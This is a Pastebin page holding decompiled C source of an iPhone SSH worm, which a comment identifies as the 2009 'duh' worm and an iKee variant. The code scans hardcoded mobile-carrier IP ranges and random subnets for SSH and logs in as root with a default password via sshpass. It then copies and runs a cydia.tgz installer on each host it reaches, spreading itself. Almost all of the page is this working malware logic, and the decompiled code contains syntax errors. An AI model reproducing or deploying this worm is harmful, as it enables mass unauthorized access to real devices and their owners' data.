API tools faq
paste
Advertisement
FlyFar

worm/sshd.c

FlyFar
Mar 24th, 2024
646
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 8.95 KB | Cybersecurity | 0 0
raw download clone embed print report
  1. /*
  2.    This file has been generated by the Hex-Rays decompiler.
  3.    Copyright (c) 2007-2015 Hex-Rays <info@hex-rays.com>
  4.  
  5.    Detected compiler: GNU C++
  6.    
  7.    /// NOTE ///
  8.    As you can see, the 'duh' worm of 2009 is just another
  9.    iKee variant, the decompiled code is VERY much the exact same
  10.    except that debug messages were mostly removed, and the infection
  11.    routine was modified...
  12.    /// END ///
  13. */
  14.  
  15. #include "sshd.h"
  16.  
  17. int fdlock;
  18.  
  19. //----- (00001984) --------------------------------------------------------
  20. char *randHost() // Generates a random SubNet to scan...
  21. {
  22.   char *retme;
  23.   int x = random() % 255;
  24.   int y = random() % 255;
  25.   int z = random() % 255;
  26.  
  27.   srand(time(0));
  28.   asprintf(&retme, "%i.%i.%i.", x, y, z);
  29.   return retme;
  30. }
  31.  
  32. //----- (00001A80) --------------------------------------------------------
  33. int get_lock(void) // Sets/Gets the status of the file lock located in /var/lock/ssh.lock
  34. {
  35.     struct flock fl;
  36.     fl.l_type = F_WRLCK;
  37.     fl.l_whence = SEEK_SET;
  38.     fl.l_start = 0;
  39.     fl.l_len = 1;
  40.     if((fdlock = open("/var/lock/ssh.lock", O_WRONLY|O_CREAT, 0666)) == -1)
  41.       return 0;
  42.     if(fcntl(fdlock, F_SETLK, &fl) == -1)
  43.       return 0;
  44.     return 1;
  45. }
  46.  
  47. //----- (00001B70) --------------------------------------------------------
  48. char *getAddrRange()
  49. {
  50.   struct ifaddrs, *ifaddr, *ifa;
  51.   int family, s;
  52.   char host[NI_MAXHOST];]
  53.  
  54.   if (getifaddrs(&ifaddr) == -1) {
  55.     perror("getifaddrs");
  56.     exit(EXIT_FAILURE);
  57.   }
  58.   for (ifa = ifaddr; ifa != NULL; i = ifa->ifa_next) {
  59.     family = ifa->ifa_addr->sa_family;
  60.     if (family == AF_INET || family == AF_INET6)
  61.     {
  62.       s = getnameinfo(ifa->ifa_addr,(family == AF_INET) ? sizeof(struct sockaddr_in): sizeof(struct sockaddr_in6), host, NI_MAXHOST, NULL, 0, NI_NUMERICHOST);
  63.       if (s != 0) {
  64.         printf("getnameinfo() failed: %s\n", gai_strerror(s));
  65.         return "0.0.0.0-0.0.0.0";
  66.       }
  67.       if (!strcmp(ifa->ifa_name, "pdp_ip0")) {
  68.         char *wee[20];
  69.         tokenise(host, wee, ".");
  70.         int octc = atoi(wee[2]);
  71.         asprintf((char*)&range, "%s.%s.%i.0-%s.%s.%i.255", wee[0], wee[1], octc, wee[0], wee[1], octc+2);
  72.         return (char*)range;
  73.       }
  74.     }
  75.   }
  76.   freeifaddrs(ifaddr);
  77.   return "0.0.0.0-0.0.0.0";
  78. }
  79.  
  80. //----- (00001DB4) --------------------------------------------------------
  81. int tokenise(char *input[], char *token[], char *spl)
  82. {
  83.   char *tokens;
  84.   int count = 0;
  85.  
  86.   tokens = strtok(input, spl);
  87.  
  88.   if(tokens[strlen(tokens)-1] == '\n') tokens[strlen(tokens)-1] = '\0';
  89.   token[count] = tokens;
  90.   while(tokens != NULL) {
  91.     count++;
  92.     if(count > 4096) return (-1);
  93.     tokens = strtok(NULL, spl);
  94.     if(tokens != NULL) {
  95.         if(tokens[strlen(tokens)-1] == '\n') tokens[strlen(tokens)-1] = '\0';
  96.       }
  97.     token[count] = tokens;
  98.   }
  99.   return count;
  100. }
  101.  
  102. //----- (00001F1C) --------------------------------------------------------
  103. int main() {
  104.   if (get_lock()) {
  105.     sleep(60);
  106.     char *ipRanges[] = { getAddrRange(),                // Local Net
  107.                          "94.157.100.0-94.157.255.255", // T-mobile, Netherlands
  108.                          "87.103.52.255-87.103.66.255", // Vodafone, Portugal
  109.                          "94.157.0.0.0-120.157.99.255", // T-mobile, Netherlands
  110.                          "114.72.0.0-114.75.255.255",   // OPTUSINTERNET, Australia
  111.                          "92.248.90.0-92.248.120.255",  // MOBILKOM, Austria
  112.                          "81.217.74.0-81.217.74.255",   // Kabelsignal AG, Austria
  113.                          "84.224.60.0-84.224.80.255",   // Pannon GSM Telecommunications Inc, Hungary
  114.                          "188.88.100.0-188.88.160.255", // T-mobile, Netherlands
  115.                          "77.248.140.0-77.248.146.255", // UPC broadband, Austria
  116.                          "77.54.160.0-77.54.190.255",   // Vodafone, Portugal
  117.                          "80.57.116.0-80.57.131.255",   // UPC broadband, Austria
  118.                          "84.224.0.0-84.224.63.255" };  // Pannon GSM Telecommunications Inc, Hungary
  119.     while(1) {
  120.       for(int j = 0; j < sizeof(ipRanges); ++j) {
  121.         scanner(ipRanges[j]);
  122.         for (int k = 0; k <= 2; ++k) {
  123.           randSubNet = randHost();
  124.           char *zeRange;
  125.           asprintf(&zeRange, "%s.0-%s.255", randSubNet, randSubNet);
  126.           scanner(zeRange);
  127.       }
  128.     }
  129.   }
  130.   return 1;
  131. }
  132.  
  133. //----- (00002110) --------------------------------------------------------
  134. void scanner(char *ipRange)
  135. {
  136.     char *wee[10];
  137.     char *begin[10];
  138.     char *end[10];
  139.     tokenise(ipRange, wee, "-");
  140.     int octaB, octaE, octbB, octbE, octcB, octcE;
  141.     tokenise(wee[0], begin, ".");
  142.     tokenise(wee[1], end, ".");
  143.     octaB = atoi(begin[0]);
  144.     octaE = atoi(end[0]);
  145.     octbB = atoi(begin[1]);
  146.     octbE = atoi(end[1]);
  147.     octcB = atoi(begin[2]);
  148.     octcE = atoi(end[2]);
  149.    
  150.     for (int loop1=octaB; loop1<=octaE; loop1++)
  151.     {
  152.         for (int loop2=octbB; loop2<=octbE; loop2++)
  153.         {
  154.             for (int loop3=octcB; loop3<=octcE; loop3++)
  155.             {
  156.                 for (int loop4=0; loop4<=255; loop4++)
  157.                 {
  158.                     char* host;
  159.                     asprintf(&host, "%i.%i.%i.%i", loop1, loop2, loop3, loop4);
  160.                     if (!scanHost(host) && !checkHost(host))
  161.                     {
  162.                         initfst(host);
  163.                     }
  164.                 }
  165.             }
  166.         }
  167.     }
  168. }
  169.  
  170. //----- (00002314) --------------------------------------------------------
  171. int scanHost(char* host)
  172. {
  173.     int res, valopt, soc;
  174.     struct sockaddr_in addr;
  175.     long arg;
  176.     fd_set myset;
  177.     struct timeval tv;
  178.     socklen_t lon;
  179.     soc = socket(AF_INET, SOCK_STREAM, 0);
  180.     arg = fcntl(soc, F_GETFL, NULL);
  181.     arg |= O_NONBLOCK;
  182.     fcntl(soc, F_SETFL, arg);
  183.     addr.sin_family = AF_INET;
  184.     addr.sin_port = htons(22);
  185.     addr.sin_addr.s_addr = inet_addr(host);
  186.     res = connect(soc, (struct sockaddr *)&addr, sizeof(addr));
  187.     if (res < 0) {
  188.       if (errno == EINPROGRESS) {
  189.         tv.tv_sec = 10;
  190.         tv.tv_usec = 0;
  191.         FD_ZERO(&myset);
  192.         FD_SET(soc, &myset);
  193.         if (select(soc+1, NULL, &myset, NULL, &tv) > 0) {
  194.             lon = sizeof(int);
  195.             getsockopt(soc, SOL_SOCKET, SO_ERROR, (void*)(&valopt), &lon);
  196.             if (valopt) {
  197.               return -1;
  198.             }
  199.         }
  200.         else {
  201.             return -1; }
  202.       }
  203.       else { return -1; }
  204.     }
  205.     close(soc);
  206.     return 0;
  207. }
  208.  
  209. //----- (000024E0) --------------------------------------------------------
  210. int checkHost(char *host) {
  211.     FILE *in;
  212.     extern FILE *popen();
  213.     char buff[512];
  214.     char *execLine;
  215.     syslog(LOG_DEBUG, "%s", host); // One of the few times he decides to call a SYSLOG.
  216.     asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'echo 99'", VULN_PASS, host);
  217.     if (in = popen(execLine, "r")) {
  218.         while (fgets(buff, 2, in) != NULL) {
  219.             if (strcmp(buff, "99"))
  220.                 return 0;
  221.         }
  222.     }
  223.     pclose(in);
  224.     return -1; // NOT VULN
  225. }
  226.  
  227. //----- (000025DC) --------------------------------------------------------
  228. int runCommand(char* command, char *host) {
  229.     FILE *in;
  230.     extern FILE *popen();
  231.     char buff[512];
  232.     char *execLine;
  233.     asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s ; echo 99'", VULN_PASS, host, command);
  234.     if (in = popen(execLine, "r")) {
  235.         while (fgets(buff, 2, in) != NULL) {
  236.             if (strcmp(buff, "99")) return 0;
  237.         }
  238.     }
  239.     pclose(in);
  240.     return -1;
  241. }
  242.  
  243. //----- (000026D8) --------------------------------------------------------
  244. int prunCommand(char* command, char *host) {
  245.     FILE *in;
  246.     extern FILE *popen();
  247.     char buff[512];
  248.     char *execLine;
  249.     asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s '%s'", VULN_PASS, host, command);
  250.     if (in = popen(execLine, "r")) {
  251.         while (fgets(buff, sizeof(buff), in) != NULL) {
  252.             printf("%s", buff);
  253.         }
  254.     }
  255.     pclose(in);
  256.     return -1;
  257. }
  258.  
  259. //----- (000027BC) --------------------------------------------------------
  260. int CopyFile(char* src, char* dst, char* host) {
  261.     FILE *in;
  262.     extern FILE *popen();
  263.     char buff[512];
  264.     char *execLine;
  265.     asprintf(&execLine, "sshpass -p %s scp -o StrictHostKeyChecking=no ./%s root@%s:%s", VULN_PASS, src, host, dst);
  266.     if (in = popen(execLine, "r")) {
  267.         while (fgets(buff, sizeof(buff), in) != NULL) {}
  268.         asprintf(&execLine, "sshpass -p %s ssh -o StrictHostKeyChecking=no root@%s 'which %s'", VULN_PASS, host, dst);
  269.         if (in = popen(execLine, "r")) {
  270.             while (fgets(buff, 2, in) != NULL ) {
  271.                 if (strcmp(buff, dst))
  272.                     return 0;
  273.             }
  274.             return -1;
  275.         }
  276.         return -1;
  277.     }
  278.     pclose(in);
  279.     return -1;
  280. }
  281.  
  282. //----- (0000294C) --------------------------------------------------------
  283. int initfst(char *host) {
  284.   if (!runCommand("mkdir /private/var/mobile/home", host))
  285.   {
  286.     if (!CopyFile("/private/var/mobile/home/cydia.tgz", "/private/var/mobile/home/cydia.tgz", host))
  287.         prunCommand("cd /private/var/mobile/home/;tar xzf cydia.tgz;./inst", host);
  288.   }
  289.   return 0;
  290. }
Tags: source code iphone botnet worm
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!